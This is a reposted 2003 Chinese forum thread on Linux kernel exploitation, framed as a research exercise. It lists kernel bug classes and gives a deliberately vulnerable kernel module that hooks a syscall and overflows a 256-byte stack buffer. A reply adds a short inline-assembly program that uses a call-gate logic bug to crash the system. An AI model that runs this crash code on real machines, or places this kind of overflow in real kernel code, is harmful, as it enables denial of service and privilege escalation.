aa-qingfenglala-ChinaUnix博客

qingfenglala

首页　| 　博文目录　| 　关于我

qingfenglala

博客访问： 93439
博文数量： 34
博客积分： 1410
博客等级：上尉
技术积分： 275
用户组：普通用户
注册时间： 2007-10-13 23:05

文章分类

全部博文（34）

net（2）
嵌入式（16）

minigui（2）

RTOS（1）

qemu（0）

skyeye（1）

ARM（0）

ARM-NXP（1）

ARM-STM（0）

wince（2）

MSP430（5）
qt（2）
gtk（0）
linux_diy（10）
未分配的博文（4）

文章存档

2011年（1）

2010年（7）

2009年（26）

我的朋友

相关博文

分类： LINUX

2009-06-27 18:39:50

目标：
内核层的exploit程序，我们如何来exploit kernel？
意义：
老外掌握了很多这种技术，一些kernel exploit能直接取得权限，众所周知，0层的权限比root权限大多了，而且内核的攻击可以跨平台，比如linux，内核的问题还可以导致嵌入式系统的崩溃。
技术实现：
需要对kernel深入了解，在0层做事比应用层难多了，应用层有4g内存可用呢:)
基础知识：
进程的内核路径的概念
cpu所处的四个路径
核心堆栈esp和任务切换的关系
中断返回的处理 iret
种类：
内核的buffer overflow
内核的format string
内核的整形溢出
内核的heap overflow
tcp/ip核心溢出
调试方法：
首先我们的研究的方法就是自己构造一个有问题的内核程序，如何实现呢？当然是写lkm，我们写一个有问题的lkm程序，加载起来，然后我们看如何去溢出它，反正我调的时候系统都不知道当了多少次，因为是内核，所以无法调试，只能凭经验猜测，目前已经能成功溢出除了heap overflow的所有种类的内核程序问题，其中整形溢出，我看了一下linux内核代码，大量存在问题，所以还是比较有意义的。这里我先给一个有问题的测试程序，各位高手可以试试，讨论讨论，也算是我为本版奉献的一个课题：


//test for kernel buffer overflow Vulnerability

//by e4gle

//gcc -O3 -c -I/usr/src/linux/include kbof.c

#define MODULE

#define __KERNEL__

#include ;

#include ;

#include ;

#include ;

#include ;

#include ;



#define __NR_fun   242



extern void* sys_call_table[];



int (*old_fun) (void );



asmlinkage int e4gle_call(unsigned int magic,char * code) {

        char buf[256];

	memcpy(buf,code,magic);  //这里有问题



}

asmlinkage int new_fun(unsigned int magic, char * buf) {

        char *  code = kmalloc(magic, GFP_KERNEL);



        if (code ==NULL) return 0;



        if (copy_from_user(code, buf, magic))  //从用户层取参数

                return 0;



        e4gle_call(magic,code);  //调用e4gle_call时，很明显会溢出，当然是在内核中

}



int init_module(void) {

  old_fun = sys_call_table[__NR_fun];

  sys_call_table[__NR_fun] = new_fun;

  printk("<1>;kbof test loaded...\n");

  return 0;

}



void cleanup_module(void) {

  sys_call_table[__NR_fun] = old_fun;

  printk("<1>;kbof test unloaded...\n");

}



//我们加载这个有问题的lkm，让它跑在内核里

[root@redhat73 test]# gcc -O3 -c -I/usr/src/linux/include kbof.c

[root@redhat73 test]# insmod -f kbof.o

Warning: kernel-module version mismatch

        kbof.o was compiled for kernel version 2.4.18-3custom

        while this kernel is version 2.4.18-3

Warning: loading kbof.o will taint the kernel: no license

Warning: loading kbof.o will taint the kernel: forced load

[root@redhat73 test]# lsmod|grep kbof

kbof                    1040   0  (unused)

如有问题或者对以上我提出的这些背景知识不了解的可以讨论一下

回复于：2003-02-18 17:34:04

闲来无事的时候我根据一些资料在SCO UNIX做过一个应用程序的exploit，用GCC编译。现在已经没有动力了，其实我很想往这方面花点时间。

回复于：2003-02-18 17:57:57

应用层的已经不是什么技术了，一马平川，很简单的

回复于：2003-02-19 10:50:55

引用：原帖由 "e4gle"]应用层的已经不是什么技术了，一马平川，很简单的
发表：

应用层我是觉的没什么难度,但了解不多以为还有更深层的东西而不敢乱说.

内核的EXPLOIT的途径是不是有两条:一是通过应用程序的攻击,逐渐提升权限,最终得到ROOT,然后是你所说的0层?二是直接对内核攻击.这应该是对系统进程进行攻击吧.其结果是系统崩溃或0层权限.在这些过程中都用和应用层EXPLOIT相同的技术吧.

回复于：2003-02-19 11:39:30

引用：原帖由 "bhpang2" 发表：

应用层我是觉的没什么难度,但了解不多以为还有更深层的东西而不敢乱说.

内核的EXPLOIT的途径是不是有两条:一是通过应用程序的攻击,逐渐提升权限,最终得到ROOT,然后是你所说的0层?二是直接对内核攻击.这应该是?.........

其实就是第二种才是内核exploit，当然都是从应用层切入攻击的。一种是直接利用内核的逻辑错误使系统当掉，一种就是我说的那几种类型，内核里跑的进程所用到的系统调用实现的问题，因为只有系统调用才是和应用层通讯的，再有就是tcp/ip协议栈的问题，这样可以从远程直接溢出

前段时间bugtraq就公布了这样一段代码，在应用层直接当掉系统，就是内核处理调用门的一个逻辑错误，我们修改了代码才能生效：


//int NT_MASK = 0x00004000;

int main( void )

{

__asm__("

        mov $0x00004000,%eax #设置NT 标志

        pushl %eax

        popfl

        lcall $7,$0

        ");

    return 1;

}

老外有一点很好，他公布的代码一般都是错误的，是故意的，让你自己去理解，修改才能有用。

阅读(503) | 评论(0) | 转发(0) |

上一篇：网络分析

下一篇：Assemble in Linux

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6